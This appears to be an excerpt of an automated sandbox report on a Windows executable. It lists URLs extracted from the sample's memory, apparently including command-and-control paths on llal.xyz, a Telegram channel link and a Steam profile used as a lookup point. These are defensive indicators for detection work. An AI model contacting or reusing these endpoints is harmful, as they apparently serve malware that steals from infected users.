          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_c
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=b1xaGseXu8jC&l=e
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
          Source: 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=MO4-iGQJS3Kg&l=en
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=96201
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1712081694.0000000008357000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712269375.000000000835A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1712081694.0000000008357000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712269375.000000000835A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://crash-reports.browser.yandex.net/submit
          Source: 0x001900000002ab40-59.exe, 00000001.00000000.1519545162.0000000000933000.00000002.00000001.01000000.00000003.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://crash-reports.browser.yandex.net/submit~S
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://crash-reports.browser.yandex.net/submit~SRxTRhSRx%R
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser-partners/_xp_builds/browser-setup.arc
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser-partners/_xp_builds/browser-setup.arcGetDownloadUrlsFromBran
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser/
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser/installer/
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser/installer/alice/scenarios/
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser/installer/alice/scenarios//browser-setup.archttps://download
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser/installer/ybLocal
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser/win7/
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser/win7//browser-setup.arc..
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1670010491.0000000008324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1670010491.0000000008324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1670010491.0000000008324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://help.steampowered.com/en/
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724819264.0000000005E30000.00000004.00001000.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1725040619.0000000007676000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://https://t.me/asdfghjrrewqqqqtfg/ujs/WorldHellostrwvfncexGostrbrCHbrGkunknownftpac/Up/gltype
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1712269375.000000000835A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1722573183.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1670243798.0000000008290000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1658364365.0000000008290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725640597.000000000829E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712291354.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722573183.0000000008297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/)
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725640597.000000000829E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712291354.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722573183.0000000008297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz//
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725640597.000000000829E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722573183.0000000008297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/D
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/U6
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.00000000059FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/Up
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722517315.00000000082A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/Up/b
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1691573716.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712291354.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1723012989.00000000082A0000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722517315.00000000082A3000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722622099.00000000082A7000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1725668402.00000000082A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/Up/b/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1691573716.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712291354.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1723012989.00000000082A0000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722517315.00000000082A3000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722622099.00000000082A7000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1725668402.00000000082A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/Up/b6
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/Up/bZ
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722517315.00000000082A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/Up/bk
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.00000000059FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/Upx
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/s
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/u
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d2
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d;
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842dU3
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
          Source: 76561199619938930[1].htm.1.drString found in binary or memory: https://steamcommunity.com/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://steamcommunity.com/discussions/
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/hg
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
          Source: 76561199619938930[1].htm.1.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199619938930
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://steamcommunity.com/market/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725040619.0000000007676000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930
